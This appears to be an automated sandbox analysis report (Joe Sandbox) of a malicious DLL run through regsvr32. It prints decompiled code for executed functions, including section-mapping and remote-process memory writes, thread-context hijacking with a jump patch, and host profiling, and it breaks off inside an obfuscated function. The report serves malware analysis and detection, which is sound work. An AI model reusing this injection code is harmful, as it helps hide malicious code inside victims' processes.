23981->23257 23982 27a7a1c 23984 27a8d86 2 API calls 23982->23984 23986 27a7a2d 23982->23986 23983 27a79c8 23983->23981 23983->23982 23985 27a9a1d RtlAllocateHeap 23983->23985 23984->23982 23985->23983 23987 27a8d86 2 API calls 23986->23987 23987->23981 23989 27a77cd 23988->23989 23990 27a785d 23989->23990 23991 27abfd9 2 API calls 23989->23991 23990->23247 23990->23260 23992 27a77e9 23991->23992 23992->23990 23993 27a7835 23992->23993 24010 27a8d70 RtlAllocateHeap 23992->24010 23995 27a8d86 2 API calls 23993->23995 23997 27a7853 23995->23997 23996 27a7806 23996->23993 23999 27a9faf 2 API calls 23996->23999 23998 27a8d86 2 API calls 23997->23998 23998->23990 24000 27a7825 23999->24000 24011 27a8b62 24000->24011 24027 27a8036 24002->24027 24009->23983 24010->23996 24014 27a89f6 24011->24014 24021 27a8960 24014->24021 24017 27a8a4f GetLastError 24018 27a8ade 24017->24018 24020 27a8a23 24020->23993 24026 27a8d70 RtlAllocateHeap 24021->24026 24023 27a8971 24024 27a89c2 lstrlenW 24023->24024 24025 27a89d3 24023->24025 24024->24025 24025->24017 24025->24018 24025->24020 24026->24023 24028 27b11d0 7 API calls 24027->24028 24029 27a8045 24028->24029 24030 27a88ce strncpy 24029->24030 24031 27a805b 24030->24031 24032 27a88ce strncpy 24031->24032 24033 27a806f 24032->24033 24034 27a88ce strncpy 24033->24034

            Executed Functions

            Function 027AD54A Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 223nativeregistrymemoryCOMMON
            Download Yara Rule

            Control-flow Graph

            C-Code - Quality: 95%
            			E027AD54A(void* __ecx, intOrPtr __edx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				long _v24;
				long _v28;
				short _v32;
				char _v36;
				intOrPtr* _v40;
				intOrPtr _v44;
				long _v48;
				void* _v52;
				void* _v53;
				char _v64;
				short _v68;
				struct _WNDCLASSEXA _v116;
				char _t81;
				intOrPtr* _t83;
				intOrPtr _t87;
				intOrPtr _t90;
				char _t97;
				short _t98;
				intOrPtr _t105;
				long _t107;
				char _t119;
				void* _t124;
				struct HWND__* _t132;
				void* _t138;
				void* _t147;
				void* _t154;
				intOrPtr _t155;
				intOrPtr _t157;
				void* _t158;
				void* _t163;
				void* _t165;

				_t81 =  *0x27bf8e4; // 0x47ffc00
				_t138 = 0;
				_v12 = __ecx;
				_t157 = __edx;
				_v20 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = 0;
				_v8 = 0;
				_v24 = 0;
				_v44 = __edx;
				if(( *(_t81 + 0x1898) & 0x00000040) != 0) {
					E027AF1DB(0x1f4);
				}
				_t12 = _t157 + 0x3c; // 0x852c50ff
				_t83 =  *_t12 + _t157;
				_v28 = _t138;
				_v40 = _t83;
				if( *_t83 != 0x4550) {
					L14:
					_t158 = _v12;
					L15:
					if(_v8 != _t138) {
						_t90 =  *0x27bf9e0; // 0x47ffa00
						 *((intOrPtr*)(_t90 + 0x10))(_t158, _v8);
						_v8 = _t138;
					}
					L17:
					if(_v16 != 0) {
						_t87 =  *0x27bf8e0; // 0x47ff8c0
						NtUnmapViewOfSection( *((intOrPtr*)(_t87 + 0x12c))(), _v16);
					}
					if(_v20 != 0) {
						NtClose(_v20);
					}
					return _v8;
				}
				_v52 =  *((intOrPtr*)(_t83 + 0x50));
				if(NtCreateSection( &_v20, 0xe, _t138,  &_v52, 0x40, 0x8000000, _t138) < 0) {
					goto L14;
				}
				_t97 =  *"18293"; // 0x39323831
				_v36 = _t97;
				_t98 =  *0x27bce70; // 0x33
				_v32 = _t98;
				_v116.lpszClassName =  &_v64;
				asm("movsd");
				_v116.lpfnWndProc = DefWindowProcW;
				_v116.cbWndExtra = _t138;
				asm("movsd");
				_v116.style = 0xb;
				_v116.lpszMenuName = _t138;
				_v116.cbSize = 0x30;
				asm("movsb");
				_v116.cbClsExtra = _t138;
				_v116.hInstance = _t138;
				if(RegisterClassExA( &_v116) != 0) {
					_t132 = CreateWindowExA(_t138,  &_v64,  &_v36, 0xcf0000, 0x80000000, 0x80000000, 0x1f4, 0x64, _t138, _t138, _t138, _t138);
					if(_t132 != 0) {
						DestroyWindow(_t132);
						UnregisterClassA( &_v64, _t138);
					}
				}
				_t105 =  *0x27bf8e0; // 0x47ff8c0
				_t107 = NtMapViewOfSection(_v20,  *((intOrPtr*)(_t105 + 0x12c))(),  &_v16, _t138, _t138, _t138,  &_v24, 2, _t138, 0x40);
				_t158 = _v12;
				if(_t107 < 0 || NtMapViewOfSection(_v20, _t158,  &_v8, _t138, _t138, _t138,  &_v24, 2, _t138, 0x40) < 0) {
					goto L15;
				} else {
					_t154 = E027A8DD5( *0x27bf8e4, 0x1ac4);
					_v36 = _t154;
					if(_t154 == 0) {
						goto L15;
					}
					 *((intOrPtr*)(_t154 + 0x224)) = _v8;
					_t163 = VirtualAllocEx(_t158, _t138, 0x1ac4, 0x1000, 4);
					WriteProcessMemory(_v12, _t163, _t154, 0x1ac4,  &_v28);
					E027A8D86( &_v36, 0x1ac4);
					_t119 =  *0x27bf8e4; // 0x47ffc00
					_t155 =  *0x27bf8f8; // 0x27a0000
					_v36 = _t119;
					 *0x27bf8f8 = _v8;
					 *0x27bf8e4 = _t163;
					E027A8E4D(_v16, _v44,  *((intOrPtr*)(_v40 + 0x50)));
					E027AD4C9(_v16, _v8, _v44);
					_t124 = E027AA5DA("Jjischug");
					_v53 = _t138;
					_t147 = 0xf;
					if(_t124 > _t147) {
						do {
							L12:
							_t63 = _t138 + 0x41; // 0x41
							 *((char*)(_t165 + _t138 - 0x40)) = _t63;
							_t138 = _t138 + 1;
						} while (_t138 < _t147);
						L13:
						lstrlenW( &_v68);
						 *0x27bf8f8 = _t155;
						 *0x27bf8e4 = _v36;
						goto L17;
					}
					_t147 = _t124;
					if(_t147 == 0) {
						goto L13;
					}
					goto L12;
				}
			}






































            0x027ad550
            0x027ad556
            0x027ad558
            0x027ad55c
            0x027ad55e
            0x027ad561
            0x027ad564
            0x027ad567
            0x027ad56a
            0x027ad56d
            0x027ad578
            0x027ad57b
            0x027ad582
            0x027ad582
            0x027ad587
            0x027ad58a
            0x027ad58c
            0x027ad58f
            0x027ad598
            0x027ad791
            0x027ad791
            0x027ad794
            0x027ad797
            0x027ad79c
            0x027ad7a2
            0x027ad7a5
            0x027ad7a5
            0x027ad7a8
            0x027ad7ac
            0x027ad7ae
            0x027ad7c3
            0x027ad7c3
            0x027ad7cd
            0x027ad7d7
            0x027ad7d7
            0x027ad7de
            0x027ad7de
            0x027ad5a7
            0x027ad5c1
            0x00000000
            0x00000000
            0x027ad5c7
            0x027ad5cf
            0x027ad5d7
            0x027ad5dd
            0x027ad5e4
            0x027ad5ec
            0x027ad5ed
            0x027ad5f4
            0x027ad5f7
            0x027ad5f8
            0x027ad5ff
            0x027ad602
            0x027ad609
            0x027ad60a
            0x027ad60d
            0x027ad619
            0x027ad63b
            0x027ad643
            0x027ad646
            0x027ad651
            0x027ad651
            0x027ad643
            0x027ad66d
            0x027ad67c
            0x027ad67f
            0x027ad684
            0x00000000
            0x027ad6ae
            0x027ad6be
            0x027ad6c0
            0x027ad6c7
            0x00000000
            0x00000000
            0x027ad6dc
            0x027ad6ef
            0x027ad703
            0x027ad70f
            0x027ad714
            0x027ad719
            0x027ad71f
            0x027ad725
            0x027ad72d
            0x027ad73d
            0x027ad749
            0x027ad753
            0x027ad75b
            0x027ad760
            0x027ad763
            0x027ad76b
            0x027ad76b
            0x027ad76b
            0x027ad76e
            0x027ad772
            0x027ad773
            0x027ad777
            0x027ad77b
            0x027ad784
            0x027ad78a
            0x00000000
            0x027ad78a
            0x027ad765
            0x027ad769
            0x00000000
            0x00000000
            0x00000000
            0x027ad769

            APIs
            • NtCreateSection.NTDLL(027ADA85,0000000E,00000000,?,00000040,08000000,00000000,?), ref: 027AD5BC
            • RegisterClassExA.USER32(?), ref: 027AD610
            • CreateWindowExA.USER32 ref: 027AD63B
            • DestroyWindow.USER32(00000000), ref: 027AD646
            • UnregisterClassA.USER32 ref: 027AD651
            • NtMapViewOfSection.NTDLL(027ADA85,00000000), ref: 027AD67C
            • NtMapViewOfSection.NTDLL(027ADA85,00000000,00000000,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 027AD6A3
            • VirtualAllocEx.KERNELBASE(00000000,00000000,00001AC4,00001000,00000004), ref: 027AD6E9
            • WriteProcessMemory.KERNELBASE(00000000,00000000,00000000,00001AC4,?), ref: 027AD703
              • Part of subcall function 027A8D86: HeapFree.KERNEL32(00000000,00000000), ref: 027A8DCC
            • lstrlenW.KERNEL32(?,?,?,?,?,?,00000000,027A623D), ref: 027AD77B
            • NtUnmapViewOfSection.NTDLL(00000000), ref: 027AD7C3
            • NtClose.NTDLL(00000000), ref: 027AD7D7
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 027A0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_27a0000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: Section$View$ClassCreateWindow$AllocCloseDestroyFreeHeapMemoryProcessRegisterUnmapUnregisterVirtualWritelstrlen
            • String ID: 0$18293$Jjischug$aeroflot
            • API String ID: 494031690-3772587274
            • Opcode ID: 7f5a317bb03c852440d36c21eece35e01ba378b34bf48856123ffe652e963338
            • Instruction ID: 8c0a1b8e4b406b4184640a12c356837528f0a35f9c539987d40a6b621dbfcbd6
            • Opcode Fuzzy Hash: 7f5a317bb03c852440d36c21eece35e01ba378b34bf48856123ffe652e963338
            • Instruction Fuzzy Hash: 428125B5E40219AFDB11DFA8DC89EEEBBB8FB08714F14456AF604A7650D730A900CB61
            Uniqueness

            Uniqueness Score: -1.00%

            Function 027AE040 Relevance: 17.8, APIs: 5, Strings: 5, Instructions: 250COMMON
            Download Yara Rule

            Control-flow Graph

            C-Code - Quality: 79%
            			E027AE040(void* __fp0) {
				char _v8;
				char _v12;
				char _v16;
				char _v144;
				char _v656;
				char _v668;
				char _v2644;
				void* __esi;
				struct _OSVERSIONINFOA* _t68;
				intOrPtr _t70;
				void* _t71;
				intOrPtr _t73;
				void* _t74;
				intOrPtr _t75;
				intOrPtr* _t77;
				intOrPtr _t79;
				intOrPtr _t80;
				intOrPtr _t81;
				intOrPtr _t87;
				int _t90;
				intOrPtr _t92;
				void* _t93;
				void* _t97;
				intOrPtr _t99;
				intOrPtr _t101;
				short _t106;
				char _t108;
				intOrPtr _t113;
				intOrPtr _t116;
				intOrPtr _t119;
				intOrPtr _t123;
				intOrPtr _t134;
				intOrPtr _t136;
				intOrPtr _t138;
				intOrPtr _t141;
				intOrPtr _t143;
				intOrPtr _t148;
				void* _t149;
				WCHAR* _t150;
				char* _t151;
				intOrPtr _t162;
				intOrPtr _t177;
				void* _t191;
				struct _OSVERSIONINFOA* _t192;
				void* _t193;
				void* _t195;
				char _t198;
				void* _t199;
				char* _t200;
				void* _t203;
				int* _t204;
				void* _t216;

				_t216 = __fp0;
				_t148 =  *0x27bf8f8; // 0x27a0000
				_t68 = E027A8D70(0x1ac4);
				_t192 = _t68;
				if(_t192 != 0) {
					 *((intOrPtr*)(_t192 + 0x1640)) = GetCurrentProcessId();
					_t70 =  *0x27bf8e0; // 0x47ff8c0
					_t71 =  *((intOrPtr*)(_t70 + 0xac))(_t193);
					_t3 = _t192 + 0x648; // 0x648
					E027B35C6( *((intOrPtr*)(_t192 + 0x1640)) + _t71, _t3);
					_t73 =  *0x27bf8e0; // 0x47ff8c0
					_t5 = _t192 + 0x1644; // 0x1644
					_t194 = _t5;
					_t74 =  *((intOrPtr*)(_t73 + 0x128))(0, _t5, 0x105);
					_t207 = _t74;
					if(_t74 != 0) {
						 *((intOrPtr*)(_t192 + 0x1854)) = E027A9790(_t194, _t207);
					}
					_t75 =  *0x27bf8e0; // 0x47ff8c0
					_t77 = E027ACA1B( *((intOrPtr*)(_t75 + 0x12c))()); // executed
					 *((intOrPtr*)(_t192 + 0x110)) = _t77;
					_t159 =  *_t77;
					if(E027ACB96( *_t77) == 0) {
						_t79 = E027ACA6B(_t159, _t194); // executed
						__eflags = _t79;
						_t162 = (0 | _t79 > 0x00000000) + 1;
						__eflags = _t162;
						 *((intOrPtr*)(_t192 + 0x214)) = _t162;
					} else {
						 *((intOrPtr*)(_t192 + 0x214)) = 3;
					}
					_t14 = _t192 + 0x220; // 0x220, executed
					_t80 = E027AF420(_t14); // executed
					 *((intOrPtr*)(_t192 + 0x218)) = _t80;
					_t81 = E027AF3E5(_t14); // executed
					 *((intOrPtr*)(_t192 + 0x21c)) = _t81;
					_t17 = _t192 + 0x114; // 0x114
					_t195 = _t17;
					 *((intOrPtr*)(_t192 + 0x224)) = _t148;
					_push( &_v16);
					_v12 = 0x80;
					_push( &_v8);
					_v8 = 0x100;
					_push( &_v656);
					_push( &_v12);
					_push(_t195);
					_push( *((intOrPtr*)( *((intOrPtr*)(_t192 + 0x110)))));
					_t87 =  *0x27bf8e8; // 0x47ffab0
					_push(0); // executed
					if( *((intOrPtr*)(_t87 + 0x6c))() == 0) {
						GetLastError();
					}
					_t90 = GetSystemMetrics(0x1000);
					_t28 = _t192 + 0x228; // 0x228
					_t149 = _t28;
					 *(_t192 + 0x1850) = 0 | _t90 > 0x00000000;
					E027AE039(_t149); // executed
					_t211 = _t149;
					if(_t149 != 0) {
						 *((intOrPtr*)(_t192 + 0x434)) = E027A9790(_t149, _t211);
					}
					_t92 = E027AC86B();
					_t33 = _t192 + 0xb0; // 0xb0
					_t196 = _t33;
					 *((intOrPtr*)(_t192 + 0xac)) = _t92;
					_t93 = E027AC65E(_t92, _t33, _t211, _t216);
					_t35 = _t192 + 0xd0; // 0xd0
					E027A9B7C(_t93, _t33, _t35);
					_t36 = _t192 + 0x438; // 0x438
					E027A97AA(_t149, _t36);
					_t97 = E027AE3C8(_t196, E027AA5DA(_t33), 0);
					_t37 = _t192 + 0x100c; // 0x100c
					E027AC881(_t97, _t37, _t216);
					_t99 =  *0x27bf8e0; // 0x47ff8c0
					_t101 = E027ACBE8( *((intOrPtr*)(_t99 + 0x12c))(_t195)); // executed
					 *((intOrPtr*)(_t192 + 0x101c)) = _t101;
					E027A8F0A(_t192, 0, 0x9c);
					_t204 = _t203 + 0xc;
					_t192->dwOSVersionInfoSize = 0x9c;
					GetVersionExA(_t192);
					 *((intOrPtr*)(_t192 + 0xa8)) = E027ADE3C(_t100);
					_t106 = E027ADE65(_t105);
					_t41 = _t192 + 0x1020; // 0x1020
					_t150 = _t41;
					 *((short*)(_t192 + 0x9c)) = _t106;
					GetWindowsDirectoryW(_t150, 0x104);
					_t108 = E027A9F8F(_t105, 0x7c4);
					_t177 =  *0x27bf8e0; // 0x47ff8c0
					_t198 = _t108;
					 *_t204 = 0x104;
					_push( &_v668);
					_push(_t198);
					_v8 = _t198;
					if( *((intOrPtr*)(_t177 + 0xec))() == 0) {
						_t143 =  *0x27bf8e0; // 0x47ff8c0
						 *((intOrPtr*)(_t143 + 0x108))(_t198, _t150);
					}
					E027A8D41( &_v8);
					_t113 =  *0x27bf8e0; // 0x47ff8c0
					_t48 = _t192 + 0x1434; // 0x1434
					_t199 = _t48;
					 *_t204 = 0x209;
					_push(_t199);
					_push(L"USERPROFILE");
					if( *((intOrPtr*)(_t113 + 0xec))() == 0) {
						E027A9FEE(_t199, 0x105, L"%s\\%s", _t150);
						_t141 =  *0x27bf8e0; // 0x47ff8c0
						_t204 =  &(_t204[5]);
						 *((intOrPtr*)(_t141 + 0x108))(L"USERPROFILE", _t199, "TEMP");
					}
					_push(0x20a);
					_t51 = _t192 + 0x122a; // 0x122a
					_t151 = L"TEMP";
					_t116 =  *0x27bf8e0; // 0x47ff8c0
					_push(_t151);
					if( *((intOrPtr*)(_t116 + 0xec))() == 0) {
						_t138 =  *0x27bf8e0; // 0x47ff8c0
						 *((intOrPtr*)(_t138 + 0x108))(_t151, _t199);
					}
					_push(0x40);
					_t200 = L"SystemDrive";
					_push( &_v144);
					_t119 =  *0x27bf8e0; // 0x47ff8c0
					_push(_t200);
					if( *((intOrPtr*)(_t119 + 0xec))() == 0) {
						_t136 =  *0x27bf8e0; // 0x47ff8c0
						 *((intOrPtr*)(_t136 + 0x108))(_t200, L"C:");
					}
					_v8 = 0x7f;
					_t59 = _t192 + 0x199c; // 0x199c
					_t123 =  *0x27bf8e0; // 0x47ff8c0
					 *((intOrPtr*)(_t123 + 0xbc))(_t59,  &_v8);
					_t62 = _t192 + 0x100c; // 0x100c
					E027B35C6(E027AE3C8(_t62, E027AA5DA(_t62), 0),  &_v2644);
					_t63 = _t192 + 0x1858; // 0x1858
					E027B3598( &_v2644, _t63, 0x20);
					_push( &_v2644);
					_push(0x1e);
					_t66 = _t192 + 0x1878; // 0x1878
					_t191 = 0x14;
					E027A9877(_t66, _t191);
					_t134 = E027ADBE6(_t191); // executed
					 *((intOrPtr*)(_t192 + 0x1898)) = _t134;
					return _t192;
				}
				return _t68;
			}























































            0x027ae040
            0x027ae04a
            0x027ae056
            0x027ae05b
            0x027ae060
            0x027ae06d
            0x027ae073
            0x027ae078
            0x027ae07e
            0x027ae08e
            0x027ae093
            0x027ae098
            0x027ae098
            0x027ae0a8
            0x027ae0ae
            0x027ae0b0
            0x027ae0b9
            0x027ae0b9
            0x027ae0bf
            0x027ae0cc
            0x027ae0d1
            0x027ae0d7
            0x027ae0e0
            0x027ae0ee
            0x027ae0f5
            0x027ae0fa
            0x027ae0fa
            0x027ae0fb
            0x027ae0e2
            0x027ae0e2
            0x027ae0e2
            0x027ae101
            0x027ae107
            0x027ae10c
            0x027ae112
            0x027ae117
            0x027ae11d
            0x027ae11d
            0x027ae126
            0x027ae12c
            0x027ae130
            0x027ae137
            0x027ae13e
            0x027ae145
            0x027ae149
            0x027ae150
            0x027ae151
            0x027ae153
            0x027ae158
            0x027ae15f
            0x027ae161
            0x027ae161
            0x027ae171
            0x027ae176
            0x027ae176
            0x027ae183
            0x027ae189
            0x027ae18e
            0x027ae190
            0x027ae199
            0x027ae199
            0x027ae1a1
            0x027ae1a6
            0x027ae1a6
            0x027ae1ac
            0x027ae1b7
            0x027ae1bc
            0x027ae1c4
            0x027ae1ca
            0x027ae1d2
            0x027ae1e4
            0x027ae1ea
            0x027ae1f2
            0x027ae1f7
            0x027ae204
            0x027ae215
            0x027ae21b
            0x027ae220
            0x027ae223
            0x027ae226
            0x027ae233
            0x027ae239
            0x027ae243
            0x027ae243
            0x027ae249
            0x027ae251
            0x027ae25c
            0x027ae261
            0x027ae267
            0x027ae269
            0x027ae276
            0x027ae277
            0x027ae278
            0x027ae283
            0x027ae285
            0x027ae28c
            0x027ae28c
            0x027ae296
            0x027ae29b
            0x027ae2a0
            0x027ae2a0
            0x027ae2a6
            0x027ae2ad
            0x027ae2ae
            0x027ae2bb
            0x027ae2ce
            0x027ae2d3
            0x027ae2d8
            0x027ae2e1
            0x027ae2e1
            0x027ae2e7
            0x027ae2ec
            0x027ae2f2
            0x027ae2f8
            0x027ae2fd
            0x027ae306
            0x027ae308
            0x027ae30f
            0x027ae30f
            0x027ae315
            0x027ae31d
            0x027ae322
            0x027ae323
            0x027ae328
            0x027ae331
            0x027ae333
            0x027ae33e
            0x027ae33e
            0x027ae347
            0x027ae34f
            0x027ae356
            0x027ae35b
            0x027ae36a
            0x027ae382
            0x027ae389
            0x027ae397
            0x027ae3a2
            0x027ae3a3
            0x027ae3a7
            0x027ae3ad
            0x027ae3ae
            0x027ae3b6
            0x027ae3bb
            0x00000000
            0x027ae3c3
            0x027ae3c7

            APIs
              • Part of subcall function 027A8D70: RtlAllocateHeap.NTDLL(00000008,?,?,027A973A,00000100,?,027A65BF), ref: 027A8D7E
            • GetCurrentProcessId.KERNEL32 ref: 027AE067
            • GetLastError.KERNEL32 ref: 027AE161
            • GetSystemMetrics.USER32(00001000), ref: 027AE171
            • GetVersionExA.KERNEL32(00000000), ref: 027AE226
              • Part of subcall function 027ACA6B: FindCloseChangeNotification.KERNELBASE(?,00001644,00000000,027A0000), ref: 027ACB0F
            • GetWindowsDirectoryW.KERNEL32(00001020,00000104), ref: 027AE251
            Strings
            Memory Dump Source
            • Source File: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 027A0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_27a0000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: AllocateChangeCloseCurrentDirectoryErrorFindHeapLastMetricsNotificationProcessSystemVersionWindows
            • String ID: %s\%s$SystemDrive$TEMP$TEMP$USERPROFILE
            • API String ID: 3131805607-2706916422
            • Opcode ID: bbdd13c4b39f3a134473d316c46ea9f51d9e90aa984e7786bb1508b66a9e1536
            • Instruction ID: 09b50049d4d1dd44d90f112a579491af4198d055cb78a4841412d8ca75d21ce7
            • Opcode Fuzzy Hash: bbdd13c4b39f3a134473d316c46ea9f51d9e90aa984e7786bb1508b66a9e1536
            • Instruction Fuzzy Hash: BD91BE71B00605AFD706EB74C858FEAB7E9FF48710F00466AF51AD7280DB74AA548FA1
            Uniqueness

            Uniqueness Score: -1.00%

            Function 027ADA5C Relevance: 6.1, APIs: 4, Instructions: 89nativethreadCOMMON
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 126 27ada5c-27ada75 call 27ad31d 129 27ada7b-27ada89 call 27ad54a 126->129 130 27adb4e-27adb59 call 27ad48e 126->130 129->130 135 27ada8f-27adac6 call 27a8f0a GetThreadContext 129->135 135->130 138 27adacc-27adb0c NtProtectVirtualMemory 135->138 139 27adb0e-27adb29 NtWriteVirtualMemory 138->139 140 27adb4c 138->140 139->140 141 27adb2b-27adb4a NtProtectVirtualMemory 139->141 140->130 141->130 141->140
            C-Code - Quality: 100%
            			E027ADA5C(void* __ecx, void** __edx, void* __eflags, intOrPtr _a4) {
				long _v8;
				long _v12;
				void* _v16;
				intOrPtr _v23;
				void _v24;
				long _v28;
				struct _CONTEXT _v744;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t33;
				void* _t57;
				long _t59;
				void* _t62;
				void** _t65;
				void* _t66;

				_t65 = __edx;
				_t57 = __ecx;
				_t66 = 0;
				if(E027AD31D(__ecx, __edx, __edx, 0) != 0) {
					_t33 = E027AD54A( *((intOrPtr*)(__edx)), _a4); // executed
					_t66 = _t33;
					if(_t66 != 0) {
						E027A8F0A( &_v744, 0, 0x2cc);
						_v744.ContextFlags = 0x10002;
						if(GetThreadContext(_t65[1],  &_v744) != 0) {
							_t62 = _v744.Eax;
							_v12 = _v12 & 0x00000000;
							_v24 = 0xe9;
							_t59 = 5;
							_v23 = _t66 - _t62 - _a4 + _t57 + 0xfffffffb;
							_v8 = _t59;
							_v16 = _t62;
							if(NtProtectVirtualMemory( *_t65,  &_v16,  &_v8, 4,  &_v12) < 0 || NtWriteVirtualMemory( *_t65, _v744.Eax,  &_v24, _t59,  &_v8) < 0) {
								L6:
								_t66 = 0;
							} else {
								_v28 = _v28 & 0x00000000;
								if(NtProtectVirtualMemory( *_t65,  &_v16,  &_v8, _v12,  &_v28) < 0) {
									goto L6;
								}
							}
						}
					}
				}
				E027AD48E();
				return _t66;
			}



















            0x027ada68
            0x027ada6a
            0x027ada6c
            0x027ada75
            0x027ada80
            0x027ada85
            0x027ada89
            0x027ada9d
            0x027adaa5
            0x027adac6
            0x027adacc
            0x027adad4
            0x027adae2
            0x027adae8
            0x027adae9
            0x027adaf5
            0x027adafc
            0x027adb0c
            0x027adb4c
            0x027adb4c
            0x027adb2b
            0x027adb2b
            0x027adb4a
            0x00000000
            0x00000000
            0x027adb4a
            0x027adb0c
            0x027adac6
            0x027ada89
            0x027adb4e
            0x027adb59

            APIs
              • Part of subcall function 027AD31D: LoadLibraryW.KERNEL32 ref: 027AD415
              • Part of subcall function 027AD54A: NtCreateSection.NTDLL(027ADA85,0000000E,00000000,?,00000040,08000000,00000000,?), ref: 027AD5BC
              • Part of subcall function 027AD54A: RegisterClassExA.USER32(?), ref: 027AD610
              • Part of subcall function 027AD54A: CreateWindowExA.USER32 ref: 027AD63B
              • Part of subcall function 027AD54A: DestroyWindow.USER32(00000000), ref: 027AD646
              • Part of subcall function 027AD54A: UnregisterClassA.USER32 ref: 027AD651
              • Part of subcall function 027A8F0A: memset.MSVCRT ref: 027A8F1C
            • GetThreadContext.KERNELBASE(?,00010002,00000000,00000000,00000000), ref: 027ADABE
            • NtProtectVirtualMemory.NTDLL(?,?,?,00000004,00000000), ref: 027ADB07
            • NtWriteVirtualMemory.NTDLL(?,?,000000E9,00000005,?), ref: 027ADB24
            • NtProtectVirtualMemory.NTDLL(?,?,?,00000000,00000000), ref: 027ADB45
            Memory Dump Source
            • Source File: 00000002.00000002.385314115.00000000027A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 027A0000, based on PE: true
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_2_2_27a0000_regsvr32.jbxd
            Yara matches
            Similarity
            • API ID: MemoryVirtual$ClassCreateProtectWindow$ContextDestroyLibraryLoadRegisterSectionThreadUnregisterWritememset
            • String ID:
            • API String ID: 1578692462-0
            • Opcode ID: e3676114c6a43fc315eeecaefed93be7c74eba805e5ce17cf936151bd9009f7b
            • Instruction ID: 958014457f1b8ed32f2bdc41c7601cb011d7508dfe97adc113194d982badfc71
            • Opcode Fuzzy Hash: e3676114c6a43fc315eeecaefed93be7c74eba805e5ce17cf936151bd9009f7b
            • Instruction Fuzzy Hash: 99312DB6A0110AAFDB21DFA8CD49FEEB7B9EF48754F1042A5EA04E2150D730DB548B91
            Uniqueness

            Uniqueness Score: -1.00%

            Function 6D518A58 Relevance: 4.8, APIs: 2, Strings: 1, Instructions: 338memoryCOMMONCrypto
            Download Yara Rule

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 222 6d518a58-6d518ac0 223 6d518f54-6d518f62 222->223 224 6d518ac6-6d518b6e call 6d5050ec 222->224 227 6d518b90-6d518bbf 224->227 228 6d518b70-6d518b7f 224->228 230 6d518bf1-6d518c29 VirtualAlloc 227->230 231 6d518bc1-6d518bd1 227->231 229 6d518b83-6d518b88 228->229 229->229 234 6d518b8a 229->234 232 6d518c42-6d518c91 call 6d509250 call 6d508cd0 230->232 233 6d518c2b-6d518c3c 230->233 235 6d518bd4-6d518be7 231->235 241 6d518f52-6d518f53 232->241 242 6d518c97-6d518c9f 232->242 233->232 234->227 235->235 236 6d518be9-6d518bed 235->236 236->230 241->223 243 6d518ca5-6d518cb7 242->243 244 6d518df4-6d518e03 242->244 245 6d518dc9-6d518dcf 243->245 246 6d518e09-6d518f29 call 6d506bba InitializeCriticalSection 244->246 247 6d518f2b-6d518f36 244->247 248 6d518dd5-6d518def 245->248 249 6d518cbc-6d518ce2 245->249 246->241 247->241 251 6d518f38-6d518f3f 247->251 248->241 252 6d518dc8 249->252 253 6d518ce8-6d518cec 249->253 251->241 255 6d518f41-6d518f4c 251->255 252->245 253->252 256 6d518cf2-6d518cf6 253->256 255->241 256->252 257 6d518cfc-6d518d27 256->257 258 6d518d36-6d518d4d 257->258 259 6d518d29-6d518d30 257->259 260 6d518d73-6d518d94 call 6d508cd0 258->260 261 6d518d4f-6d518d71 258->261 259->258 264 6d518d95-6d518d9e 260->264 261->260 261->261 264->264 265 6d518da0-6d518dc2 264->265 265->252
            C-Code - Quality: 80%
            			E6D518A58() {
				void* __edi;
				signed int _t211;
				long _t221;
				void* _t222;
				intOrPtr _t250;
				signed int _t280;
				void* _t296;
				intOrPtr _t298;
				signed int _t299;
				intOrPtr _t303;
				void* _t305;
				signed int _t306;
				intOrPtr _t307;
				intOrPtr _t308;
				intOrPtr _t313;
				intOrPtr _t315;
				void* _t332;
				signed int _t339;
				signed int _t340;
				signed int _t341;
				signed int _t342;
				void* _t343;
				signed int _t344;
				signed short _t349;
				signed int _t350;
				void* _t354;
				signed int _t356;
				signed int _t359;
				signed int _t363;
				signed int _t366;
				signed int* _t368;
				signed int _t372;
				signed int _t374;
				signed int _t382;
				signed int _t383;
				signed int _t385;
				void* _t386;
				void* _t387;

				_t307 =  *((intOrPtr*)(_t386 + 0x28));
				_t341 =  *(_t386 + 0x30);
				_t298 =  *((intOrPtr*)(_t386 + 0x38)) + 0xfffff9cd;
				 *(_t386 + 0xc) = _t307 - 0x484;
				 *((intOrPtr*)(_t386 + 4)) = _t341 + 0xc8a;
				 *((intOrPtr*)(_t386 + 0x3c)) = _t298;
				_t374 = _t307 - 0xb37;
				 *(_t386 + 0x30) =  *(_t386 + 0x40) + 0xfffffb4a;
				_t308 =  *((intOrPtr*)(_t386 + 0x28));
				 *(_t386 + 0xc) = _t374;
				 *(_t386 + 0x44) = _t308 - 0x29b2;
				 *((intOrPtr*)(_t386 + 0x28)) = _t341 + 0x71f;
				if( *(_t386 + 0x30) == _t341 + 0xbc5) {
					L33:
					return  *(_t386 + 0x30) + 0xfffffbdc;
				}
				_t368 =  *(_t386 + 0x2c);
				_t359 =  *(_t386 + 0x24) + 0xffffff3b;
				_push(_t359 - 0xe2);
				_push(_t374);
				_push(_t359 - 0xbc5);
				_push(_t374 + 0xb56);
				_push(_t368);
				_push(_t298 + 0x241);
				_push(_t359 + 0x10);
				_t342 =  *(_t386 + 0x4c);
				_push(_t341 + 0x640);
				_push(_t308);
				_push(_t374 - 0x88);
				_push(_t359 - 0x8ca);
				_push(_t342 + 0x3a5);
				_push(_t308 - 0x10e);
				_push(_t342 + 0x4b6);
				_push(_t359 + 0x3f2);
				_push(_t374 + 0x71c);
				_t299 = E6D5050EC();
				_t387 = _t386 + 0x40;
				 *(_t387 + 0x40) = _t299;
